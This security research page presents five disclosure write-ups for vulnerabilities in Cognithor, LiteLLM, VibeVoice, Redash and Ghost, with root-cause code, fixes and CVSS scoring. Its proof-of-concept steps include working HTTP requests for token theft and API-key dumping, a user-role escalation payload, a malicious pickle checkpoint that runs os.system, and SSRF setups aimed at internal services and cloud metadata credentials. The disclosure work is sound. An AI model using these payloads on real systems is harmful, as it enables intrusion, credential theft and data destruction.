Security Research

Real vulnerabilities.
Real fixes.

Every report below was confirmed exploitable, responsibly disclosed, and patched by the affected team.

Critical · Cognithor · Apr 2026

Any Visitor Could Steal Every API Key — Zero Authentication Required

CVSS 9.8 · CWE-306

Critical · LiteLLM · Apr 2026

Org Admin Elevates Any User to Proxy Admin Across All Tenants in a Single Request

CVSS 9.0 · CWE-862 · CWE-269

High · Microsoft · VibeVoice · Apr 2026

Malicious Checkpoint File Executes Arbitrary Code Before the App Loads

CVSS 7.8 · CWE-502

Medium · Redash · Apr 2026

Three Query Runners Reach Internal Services, Returning Response Bodies to the API Caller

CVSS 6.8 · CWE-918

Medium · Ghost · Apr 2026

Webhook Delivery Fires Against Internal Network Addresses, Exposing Cloud Metadata

CVSS 5.5 · CWE-918

Want Kira on your codebase?

See what’s actually exploitable before attackers do.

Get a free exploit report →
CRITICAL CVSS 9.8 · GHSA-cognithor-001 · Fixed v0.78.2 ↗

Any Visitor Could Steal Every API Key — Zero Authentication Required

cognithor (jarvis)
≤ v0.78.1
v0.71.0
CWE-306 · CWE-200
2026-04-08
Fixed v0.78.2

The /api/v1/bootstrap endpoint returns the application’s master bearer token to any caller, with no authentication. Because the API server binds to 0.0.0.0 by default, any host that can reach the server port can retrieve the token in a single HTTP request, then access every protected endpoint, exfiltrate all stored credentials, and trigger destructive operations such as a factory reset.

01 Root Cause

On startup, cognithor generates (or reads from the environment) a master bearer token stored in _internal_api_token. This is the sole credential used by _verify_cc_token to authenticate every protected endpoint. The /api/v1/bootstrap route returns it unconditionally — no auth dependency, no caller check:

# __main__.py:555 — binds to all interfaces by default
api_host = args.api_host or os.environ.get("JARVIS_API_HOST", "0.0.0.0")

# __main__.py:564–566 — master token set once, never rotated
api_token = os.environ.get("JARVIS_API_TOKEN") or _secrets.token_urlsafe(32)
_internal_api_token = api_token

# __main__.py:607 — exempt from rate limiting
_rate_exempt = {"/api/v1/health", "/api/v1/bootstrap"}

# __main__.py:674–676 — returns token to any caller
@api_app.get("/api/v1/bootstrap")
async def _cc_bootstrap() -> dict[str, str]:
    return {"token": _internal_api_token}

The endpoint is also exempt from rate limiting, making repeated or automated retrieval completely unconstrained.

02 Proof of Concept (Verified)

Verified against cognithor 0.71.0 in an isolated Docker container (python:3.12), default configuration, installed via pip install -e '.[web]'.

Step 1 — Steal the master token (zero credentials)

GET /api/v1/bootstrap HTTP/1.1
Host: 127.0.0.1:7999

HTTP/1.1 200 OK
{"token":"xnywC10rb0HiM4yu40hFbEdhXs4yTj8sDYjThWIl7gY"}

Step 2 — Exfiltrate full configuration (13,312 bytes, 14 API keys)

GET /api/v1/config HTTP/1.1
Host: 127.0.0.1:7999
Authorization: Bearer xnywC10rb0HiM4yu40hFbEdhXs4yTj8sDYjThWIl7gY

HTTP/1.1 200 OK · content-length: 13312
{
  "openai_api_key": "...",
  "anthropic_api_key": "...",
  "gemini_api_key": "...",
  "groq_api_key": "...",
  "deepseek_api_key": "...",
  "mistral_api_key": "...",
  "together_api_key": "...",
  "openrouter_api_key": "...",
  "xai_api_key": "...",
  "github_api_key": "...",
  "bedrock_api_key": "...",
  "huggingface_api_key": "...",
  "elevenlabs_api_key": "...",
  "pg_password": "...",
  ...
}

Step 3 — Factory reset (destructive)

POST /api/v1/config/factory-reset HTTP/1.1
Host: 127.0.0.1:7999
Authorization: Bearer xnywC10rb0HiM4yu40hFbEdhXs4yTj8sDYjThWIl7gY

HTTP/1.1 200 OK
{"status":"ok","message":"Configuration reset to defaults"}

Control — auth enforced on all other endpoints

GET /api/v1/credentials HTTP/1.1
Host: 127.0.0.1:7999

HTTP/1.1 401 Unauthorized
{"detail":"Unauthorized"}
03 Endpoints Accessible With Stolen Token
Endpoint                           Method               Impact
/api/v1/config                     GET                  All LLM API keys and DB passwords
/api/v1/credentials                GET                  All stored service credentials
/api/v1/config/factory-reset       POST                 Wipe entire user configuration
/api/v1/agents                     GET · POST · DELETE  Enumerate, create, or delete agents
/api/v1/vault/stats                GET                  Vault metadata
/api/v1/sessions/guard/violations  GET                  Security audit records
/api/v1/isolation/secrets          GET                  Isolation layer secret stats
04 Business Impact

Any attacker with network access to the cognithor port can silently exfiltrate every LLM API key, password, and secret in a single unauthenticated HTTP request. No prior knowledge, credentials, or user interaction required. On any deployment reachable over a local network or the internet, this is a complete compromise of all integrated third-party credentials.

05 Recommended Fix

Remove /api/v1/bootstrap or gate it with dependencies=[Depends(_verify_cc_token)]. The intended use case — delivering the session token to the local frontend — can be satisfied by embedding the token in the served HTML at render time, or by passing it as a URL fragment on CLI launch (never transmitted over the network, and inaccessible cross-origin).

As an immediate defence-in-depth measure, change the default bind from 0.0.0.0 to 127.0.0.1 at __main__.py:555 so the API is unreachable on external interfaces unless explicitly configured.
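The gate that eventually shipped rejects non-loopback callers. Its core check is framework-independent; a minimal sketch with the stdlib ipaddress module (the function name is ours, not cognithor's):

```python
import ipaddress

def allow_bootstrap(client_ip: str) -> bool:
    # Only loopback callers may fetch the bootstrap token;
    # everyone else should receive a 403.
    try:
        return ipaddress.ip_address(client_ip).is_loopback
    except ValueError:
        return False  # unparsable address: deny by default

print(allow_bootstrap("127.0.0.1"))  # True
print(allow_bootstrap("::1"))        # True
print(allow_bootstrap("10.0.0.5"))   # False
```

In FastAPI this check would read the client address from the request object inside a dependency; the deny-by-default branch matters because a missing or malformed peer address should never grant access.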

Fix shipped in v0.78.2 ↗ — /api/v1/bootstrap now rejects non-loopback callers with 403, and the default bind changed from 0.0.0.0 to 127.0.0.1. Credited in the commit message, SECURITY.md, release notes, and annotated git tag.

CRITICAL CVSS 9.0 · CWE-862 · CWE-269 · BerriAI/litellm

Org Admin Elevates Any User to Proxy Admin Across All Tenants in a Single Request

LiteLLM Proxy
≤ v1.83.2
internal_user_endpoints.py
CWE-862 · CWE-269
9.0 CRITICAL
org_admin key
v1.83.2 (Docker + PostgreSQL)
Patched v1.83.7

An org_admin can elevate any user on the platform to proxy_admin via POST /user/bulk_update. Two compounding authorization failures make this possible: organization_id passes the middleware membership check but is silently dropped by Pydantic before the handler runs, so it never constrains which users can be targeted. Simultaneously, user_role passes through the update helper with no elevation check, allowing any caller who reaches the endpoint to write proxy_admin into the database for arbitrary user IDs. The impact is irreversible without direct PostgreSQL access.

01 Root Cause

Failure 1 — organization_id is a routing credential, not a scope boundary

Route-level access for org_admin is gated by _user_is_org_admin(), which reads organization_id from the raw JSON body and confirms the caller administers that org. However, organization_id is not a field in BulkUpdateUserRequest. Pydantic silently drops it on parse. The handler never receives it and never uses it to constrain which users are written to.

# BulkUpdateUserRequest — organization_id is absent
class BulkUpdateUserRequest(BaseModel):
    users: Optional[List[str]]
    all_users: Optional[bool]
    user_updates: Optional[UpdateUserRequest]
    # organization_id not declared → silently dropped by Pydantic

# _user_is_org_admin() reads from raw JSON body (passes ✓)
singular = request_data.get("organization_id", None)
if singular is not None:
    candidate_org_ids.append(singular)
# ...confirms caller is org_admin of that org, grants access

# Handler never sees organization_id again — no user filter applied
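Failure 1 can be reproduced in miniature without LiteLLM. The sketch below mimics Pydantic's default "ignore unknown fields" parse using only the stdlib (the parse helper is ours, not Pydantic's API): the raw-body check sees organization_id, the parsed model does not.

```python
import json

# Fields declared on BulkUpdateUserRequest (per the report)
DECLARED_FIELDS = {"users", "all_users", "user_updates"}

def parse_like_pydantic(raw_body: bytes) -> dict:
    # Pydantic's default config silently ignores undeclared fields;
    # this stdlib stand-in does the same.
    return {k: v for k, v in json.loads(raw_body).items()
            if k in DECLARED_FIELDS}

raw = json.dumps({
    "users": ["835fc939-..."],
    "user_updates": {"user_role": "proxy_admin"},
    "organization_id": "14224e0e-...",
}).encode()

# Middleware reads the RAW body: the org-membership check passes.
print("organization_id" in json.loads(raw))           # True

# The handler receives only the parsed model: the field is gone.
print("organization_id" in parse_like_pydantic(raw))  # False
```

Any authorization decision made on a field that does not survive the parse is a decision the handler can never enforce.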

Failure 2 — user_role passes through the update helper with no elevation check

# _update_internal_user_params() — no role-elevation guard
def _update_internal_user_params(data_json: dict, data: UpdateUserRequest):
    non_default_values = {}
    for field, value in data_json.items():
        if value is not None:
            non_default_values[field] = value  # user_role included unconditionally
    return non_default_values

Any caller who reaches the endpoint can write proxy_admin into the DB for any user ID in the users list. The can_user_call_user_update() check that exists elsewhere in the codebase is not applied to user_role writes here.

02 Reproduction

Step 1 — Enumerate target users (org_admin can call /user/list)

GET /user/list HTTP/1.1
Authorization: Bearer sk-k8UiO_Z0QOIbhjpQTFxR2Q

HTTP 200 — returns all users and their current roles

Step 2 — Escalate arbitrary users to proxy_admin

POST /user/bulk_update HTTP/1.1
Authorization: Bearer sk-k8UiO_Z0QOIbhjpQTFxR2Q
Content-Type: application/json

{
  "users": ["835fc939-...", "645e8518-..."],
  "user_updates": { "user_role": "proxy_admin" },
  "organization_id": "14224e0e-bafc-48a3-8ce1-e6553eb30585"
}

HTTP 200
{
  "results": [
    { "user_id": "835fc939-...", "success": true,
      "updated_user": { "user_role": "proxy_admin" } },
    { "user_id": "645e8518-...", "success": true,
      "updated_user": { "user_role": "proxy_admin" } }
  ],
  "successful_updates": 2,
  "failed_updates": 0
}

Step 3 — Verify escalation

GET /user/info?user_id=835fc939-c36f-48ca-be37-b8506be7affd
Authorization: Bearer sk-k8UiO_Z0QOIbhjpQTFxR2Q

{ "user_info": { "user_role": "proxy_admin", ... } }

Users across organizations — including users completely unrelated to the attacker’s org — are now proxy_admin. The organization_id field served only as a routing credential; it was never applied as a data filter.

03 Impact

Any org_admin credential — obtained via phishing, credential stuffing, or insider access — can elevate arbitrary users to proxy_admin in a single API call. proxy_admin has full access to all LLM model configurations, API keys, spend data, and routing rules for every tenant on the platform. There is no API-level rollback; recovery requires a direct UPDATE litellm_usertable SET user_role = ... in PostgreSQL.

04 CVSS Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Base Score: 9.0 CRITICAL

AV:N — exploitable over the network via the LiteLLM API
AC:L — no special conditions; a single POST request suffices
PR:L — requires only an org_admin key (low privilege relative to proxy_admin)
UI:N — no user interaction required
S:C — scope changed; org-level privilege grants cross-tenant control
C:H — full access to all model configs, keys, and spend data
I:H — arbitrary users can be permanently escalated
A:H — recovery requires direct DB access; no API rollback
05 Recommended Fix

Fix 1 — enforce organization_id as a data filter

Add organization_id to BulkUpdateUserRequest so Pydantic preserves it, then filter the target users list inside bulk_user_update() to only users belonging to that org before any write.

class BulkUpdateUserRequest(BaseModel):
    users: Optional[List[str]]
    all_users: Optional[bool]
    user_updates: Optional[UpdateUserRequest]
    organization_id: Optional[str]  # ← add; now survives Pydantic parse

Fix 2 — add a role-elevation guard

if "user_role" in data_json:
    requested_role = data_json["user_role"]
    elevated_roles = {
        LitellmUserRoles.PROXY_ADMIN.value,
        LitellmUserRoles.PROXY_ADMIN_VIEW_ONLY.value,
    }
    if requested_role in elevated_roles:
        if user_api_key_dict.user_role != LitellmUserRoles.PROXY_ADMIN.value:
            raise HTTPException(
                status_code=403,
                detail="Only proxy_admin can set user_role to proxy_admin",
            )

Fix 1 shipped in v1.83.7-stable (PR #25554). Fix 2 shipped in v1.83.8-nightly (PR #25541).

HIGH CVSS 7.8 · CWE-502 · microsoft/VibeVoice · commit 4a78d3e ↗

Malicious Checkpoint File Executes Arbitrary Code Before the App Loads

microsoft/VibeVoice
CWE-502
7.8 HIGH
2026-04
Offgrid Security
Patched

VibeVoice’s checkpoint conversion script called torch.load() on an attacker-supplied file path with no weights_only=True guard. PyTorch’s default pickle deserializer executes arbitrary Python during unpickling — before any model code runs. A crafted .pt file drops a shell, exfiltrates credentials, or pivots to internal services the moment a developer or CI runner processes it.

01 Root Cause

convert_nnscaler_checkpoint_to_transformers.py loaded model weights using the bare torch.load() call. PyTorch ≤ 2.5 defaults to full pickle deserialization, which executes embedded Python objects during __reduce__ reconstruction. The weights_only=True flag (added in PyTorch 1.13, enforced by default in 2.6) restricts loading to safe tensor primitives and was not set.

# Vulnerable (convert_nnscaler_checkpoint_to_transformers.py)
checkpoint = torch.load(args.input_path, map_location="cpu")

# Fixed
checkpoint = torch.load(args.input_path, map_location="cpu", weights_only=True)

Because the script is a CLI utility that accepts an arbitrary file path from the command line, any checkpoint file sourced from outside the development team — a public model hub, a shared drive, a CI artifact store — becomes a remote code execution vector.
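The deserialization primitive itself needs nothing from PyTorch; the stdlib pickle module alone demonstrates it. This sketch (assuming a POSIX shell for the harmless touch payload) fires a side effect during pickle.loads, at exactly the point where torch.load would run attacker code:

```python
import os
import pickle
import tempfile

marker = os.path.join(tempfile.gettempdir(), "pickle_poc_marker")
if os.path.exists(marker):
    os.remove(marker)

class Payload:
    def __reduce__(self):
        # Unpickling invokes this (callable, args) pair immediately.
        # A harmless `touch` here; an attacker ships a shell instead.
        return (os.system, ("touch " + marker,))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # code executes here, before any "model" is inspected
print(os.path.exists(marker))  # True
```

The bytes never have to look like a tensor; the loader executes the embedded callable before any shape or dtype check could reject the file.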

02 Reproduction

Step 1 — Craft a malicious checkpoint

import torch, pickle, os

class Payload(object):
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned",))

torch.save(Payload(), "evil.pt")

Step 2 — Pass it to the conversion script

python convert_nnscaler_checkpoint_to_transformers.py \
    --input_path evil.pt --output_path out/

Step 3 — Observe execution before model loads

$ cat /tmp/pwned
uid=1000(dev) gid=1000(dev) groups=1000(dev)

Step 4 — Confirm on CI

Replace os.system("id > /tmp/pwned") with any payload. In a CI environment the process runs with the runner’s token and network access, enabling credential exfiltration or lateral movement before the job completes.

03 CVSS Breakdown
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Base Score: 7.8 HIGH

AV:L — attacker supplies a file (local vector); no network service needed
AC:L — no special conditions; any .pt file path is sufficient
PR:N — no privileges required to pass a file to the script
UI:R — a user or CI job must invoke the conversion script
S:U — scope unchanged; code runs as the invoking process
C:H / I:H / A:H — full RCE in the process context
04 Impact

Any developer, CI runner, or automated pipeline that processes an externally sourced .pt checkpoint is fully compromised at the point of deserialization — before the model is inspected or any output is produced. In a cloud CI environment this typically means access to repository secrets, cloud provider credentials, and the internal network.

05 Recommended Fix

Pass weights_only=True to every torch.load() call that handles externally sourced files. On PyTorch ≥ 2.6 this is the default; for earlier versions it must be set explicitly.

Microsoft acknowledged the disclosure and patched the affected script. Offgrid Security credited as reporter.

MEDIUM CVSS 6.8 · CWE-918 · getredash/redash

Three Query Runners Reach Internal Services, Returning Response Bodies to the API Caller

Redash
elasticsearch.py, graphite.py, prometheus.py
CWE-918
6.8 MEDIUM
Admin
Hardened

Three Redash query runners stored user-supplied URLs verbatim and passed them directly to requests.get() with no scheme check, hostname resolution guard, or private-range blocklist. The Elasticsearch runner’s error handler embedded full response bodies from the internal target in its API response — making this a non-blind SSRF requiring no out-of-band infrastructure. A compromised Redash admin account escalates to read access across internal HTTP services the victim org kept outside the BI tier.

01 Threat Model

The critical framing is a privilege boundary violation. A Redash admin is a BI or data engineering role — not an infrastructure role. They have no legitimate access to internal Elasticsearch admin APIs, network services, or cloud metadata. The realistic attacker is an external adversary with a compromised Redash admin credential (phishing, credential stuffing, password reuse). Redash instances are intentionally internet-facing. This SSRF collapses the boundary between application-layer compromise and infrastructure access.

02 Root Cause

All three runners stored user-supplied URLs verbatim and interpolated them directly into HTTP requests. No validation existed in any runner or in the base class.

Variant 1 — Elasticsearch (non-blind)

# elasticsearch.py:94 — URL stored verbatim
self.server_url = self.configuration.get("server", "")

# elasticsearch.py:326 — fired against attacker URL + /_cluster/health
r = requests.get("{0}/_cluster/health".format(self.server_url), auth=self.auth)

# elasticsearch.py:471 — full response body returned to API caller
error = "Failed to execute query. Return Code: {0} Reason: {1}".format(
    r.status_code, r.text
)

When the SSRF target returns any non-2xx status, r.text is embedded in the error string and returned to the caller. The attacker controls the URL; the target’s full response body is exfiltrated over the normal Redash API response.

Variant 2 — Graphite (semi-blind)

self.base_url = "%s/render?format=json&" % self.configuration["url"]
response = requests.get(url, auth=self.auth, verify=self.verify)

Returns HTTP status code only — useful for port probing before pivoting to the Elasticsearch runner for data extraction.

Variant 3 — Prometheus (query parameter bypass)

# get_schema appends a fixed suffix — neutralised by a query param in the URL:
http://internal-service:9090/target-path?x=
# becomes:
http://internal-service:9090/target-path?x=/api/v1/label/__name__/values

The internal service ignores the extra query parameter and responds normally.
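The bypass is plain URL mechanics, and urllib.parse makes it visible: once the configured URL ends in a query parameter, any fixed suffix the runner appends lands in the query string, leaving the attacker-chosen path untouched.

```python
from urllib.parse import urlsplit

base = "http://internal-service:9090/target-path?x="  # attacker-configured URL
suffix = "/api/v1/label/__name__/values"              # fixed suffix the runner appends

parts = urlsplit(base + suffix)
print(parts.path)   # /target-path
print(parts.query)  # x=/api/v1/label/__name__/values
```

The request therefore hits /target-path on the internal host; the "safety" suffix survives only as an ignored query parameter.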

03 Reproduction

Step 1 — Create data source pointing at an internal service

POST /api/data_sources
Authorization: Key <admin-api-key>

{
  "name": "ssrf-probe",
  "type": "elasticsearch",
  "options": { "server": "http://internal-elasticsearch:9200/_cat" }
}

Step 2 — Trigger via test_connection (no query required)

POST /api/data_sources/<id>/test
Authorization: Key <admin-api-key>

→ Elasticsearch returns 404 for /_cat/_cluster/health
→ r.text (the _cat API directory listing) returned in error body

Step 3 — Enumerate restricted indices

PUT /api/data_sources/<id>
{"options": {"server": "http://internal-elasticsearch:9200/_cat/indices?v"}}

Trigger test_connection → plaintext index table returned via exception handler

Further targets:
/_security/user     → all users and role assignments
/_cluster/settings  → full cluster configuration
/_snapshot          → snapshot repository listing
04 Impact

The Redash server’s network position is the attack surface. Any HTTP-native service reachable from the Redash host but not from the attacker’s machine is now accessible. Internal services reachable via this vector include: Elasticsearch admin APIs, InfluxDB, CouchDB (including /_users/_all_docs), Prometheus, unauthenticated Grafana instances (connection strings for all data sources), Docker daemon on port 2375, and Kubernetes API server.

On EC2 instances with IMDSv1 enabled, the Elasticsearch error handler exfiltrates IAM credentials (AccessKeyId, SecretAccessKey, SessionToken) from 169.254.169.254 in a single API call.

05 CVSS Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
Base Score: 6.8 MEDIUM

AV:N — exploitable via the public-facing Redash API
AC:L — no race condition or special timing required
PR:H — valid admin credentials required
UI:N — no victim interaction after credentials obtained
S:C — scope changed; requests leave Redash into internal infrastructure
C:H — full response body from internal services returned to caller
I:N — exploit path uses GET requests only
A:N — no denial-of-service impact

Note: environmental score increases significantly on deployments with reachable internal HTTP services or EC2 instances with IMDSv1 enabled.
06 Vendor Response

Redash maintainers acknowledged the report and updated all affected query runners to use Advocate for consistency with BaseHTTPQueryRunner, ensuring ENFORCE_PRIVATE_ADDRESS_BLOCK applies uniformly. They classified the change as a hardening improvement rather than a security fix, noting that data source creation is gated by @require_admin and that configuring connections to arbitrary hosts is a core product function.

All three runners updated to route outbound requests through Advocate with ENFORCE_PRIVATE_ADDRESS_BLOCK enabled. No CVE or advisory issued.
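Advocate performs this filtering in-process at connection time. The essential check (resolve the hostname first, then reject private, loopback, and link-local results) can be sketched with the stdlib; the function name is ours, not Advocate's API, and a real implementation must also pin the validated IP for the actual request to defeat DNS rebinding.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

def url_resolves_private(url: str) -> bool:
    # Resolve the URL's host and flag any private/loopback/link-local
    # address among the results. Sketch only: Advocate additionally
    # connects to the vetted IP rather than re-resolving.
    host = urlsplit(url).hostname or ""
    for *_, sockaddr in socket.getaddrinfo(host, None):
        ip = ipaddress.ip_address(sockaddr[0])
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            return True
    return False

print(url_resolves_private("http://127.0.0.1:9200/_cat"))  # True
```

Checking the URL string alone is insufficient; only the post-resolution address reveals whether a friendly-looking hostname points into RFC-1918 space.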

MEDIUM CVSS 5.5 · CWE-918 · 815962d ↗

Webhook Delivery Fires Against Internal Network Addresses, Exposing Cloud Metadata

Ghost CMS
webhook-trigger.js
CWE-918
5.5 MEDIUM
2026-04-03
Admin / Integration key
Patched

Ghost’s webhook delivery path used a plain HTTP client with no SSRF protections. An authenticated admin could register a webhook pointing at internal network addresses — including AWS/GCP/Azure instance metadata endpoints — and trigger it by publishing a post. Ghost already maintained a hardened request library (request-external.js) used everywhere else in the codebase; the webhook path simply never called it.

01 Root Cause

Ghost maintains two HTTP clients. @tryghost/request is a plain got wrapper with no URL validation. request-external.js is a hardened wrapper that blocks all RFC-1918 and link-local ranges, handles octal/hex notation and IPv4-mapped IPv6, and prevents DNS rebinding via a custom lookup hook. Ghost uses request-external.js for oEmbed fetches, webmention processing, recommendation metadata, and external media inlining — but webhook-trigger.js used the unprotected client.

// webhook-trigger.js:19 — vulnerable
this.request = request ?? require('@tryghost/request');

// webhook-trigger.js:112 — URL taken directly from DB, no validation
const url = webhook.get('target_url');

// webhook-trigger.js:139 — fires against any URL including private ranges
await this.request(url, opts);

// request-external.js:74 — SSRF protection that was NOT used
if (a === 169 && b === 254) { return true; } // blocks 169.254.x.x
02 Reproduction

Step 1 — Create an integration

POST /ghost/api/admin/integrations/
{"integrations": [{"name": "probe"}]}

→ 201, returns integration_id

Step 2 — Register a webhook targeting AWS metadata

POST /ghost/api/admin/webhooks/
{"webhooks": [{
  "name": "ssrf-probe",
  "event": "post.published",
  "target_url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
  "integration_id": "<integration_id>"
}]}

→ 201, webhook created with internal target_url

Step 3 — Trigger by publishing a post

POST /ghost/api/admin/posts/
{"posts": [{"title": "Trigger", "status": "published"}]}

Step 4 — Read the observable signal

GET /ghost/api/admin/integrations/<integration_id>/?include=webhooks

"last_triggered_status": 200            → port open, HTTP service responded
"last_triggered_error": "ETIMEDOUT"     → port filtered
"last_triggered_error": "ECONNREFUSED"  → port closed
03 Impact

This is a blind SSRF — response bodies are not returned. However, the HTTP status code and Node.js error string stored in last_triggered_status / last_triggered_error are sufficient for precise internal port scanning, cloud metadata probing (confirming whether IMDSv1 or IMDSv2 is active), and reaching internal HTTP endpoints that change state on a request. Ghost retries failed deliveries up to 5 times, so a single webhook registration produces up to 6 requests per trigger event.
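The two stored fields form a small but reliable oracle; a hypothetical helper (ours, not Ghost code) makes the mapping an attacker would apply explicit:

```python
def classify_port(last_triggered_status, last_triggered_error):
    # Mirrors the signal table in Step 4 of the reproduction.
    if last_triggered_status is not None:
        return "open"      # an HTTP service answered
    if last_triggered_error == "ETIMEDOUT":
        return "filtered"  # no response: firewalled or silently dropped
    if last_triggered_error == "ECONNREFUSED":
        return "closed"    # RST received: host up, port closed
    return "unknown"

print(classify_port(200, None))             # open
print(classify_port(None, "ETIMEDOUT"))     # filtered
print(classify_port(None, "ECONNREFUSED"))  # closed
```

Iterating target_url over internal host:port pairs and reading these fields back through the Admin API yields a conventional port scan conducted entirely from Ghost's network position.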

Internal targets reachable via this vector: AWS EC2 metadata (169.254.169.254), GCP metadata service (metadata.google.internal), Azure IMDS, Docker host gateway (172.17.0.1), internal databases, Kubernetes API server, and Prometheus metrics endpoints.

04 CVSS Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
Base Score: 5.5 MEDIUM

AV:N — exploitable over the network via the Ghost Admin API
AC:L — no special conditions; create webhook + publish post
PR:H — requires admin session or integration API key
UI:N — no user interaction needed after setup
S:C — scope changed; Ghost server reaches internal network
C:L — port state + error codes observable; blind SSRF
I:L — limited write capability via HTTP to internal services
A:N — no availability impact
05 Recommended Fix

Replace the unprotected HTTP client in webhook delivery with request-external.js — the hardened library Ghost already uses everywhere else. This is a one-line change in webhook-trigger.js:

// Current (vulnerable):
this.request = request ?? require('@tryghost/request');

// Fixed:
this.request = request ?? require('../../lib/request-external');

As defence-in-depth, validate target_url at webhook creation time: enforce http/https scheme and optionally block private hostname patterns in the data schema.
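A creation-time validator along those lines could look like the sketch below (the function name is ours; note that a hostname that is not a literal IP cannot be judged here and must be re-checked at DNS-lookup time, which is what request-external.js does):

```python
import ipaddress
from urllib.parse import urlsplit

def is_forbidden_target(url: str) -> bool:
    # Creation-time screen for webhook target URLs: enforce scheme,
    # reject literal private/link-local/loopback IPs outright.
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return True
    host = parts.hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # hostname: defer to the lookup-time guard
    return ip.is_private or ip.is_link_local or ip.is_loopback

print(is_forbidden_target("http://169.254.169.254/latest/meta-data/"))  # True
print(is_forbidden_target("https://example.com/hook"))                  # False
```

This screen alone does not stop an attacker who registers a hostname resolving to 169.254.169.254, which is exactly why the delivery path still needs the hardened client.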

Patched in 815962d ↗ — Ghost now routes webhook delivery through request-external.js.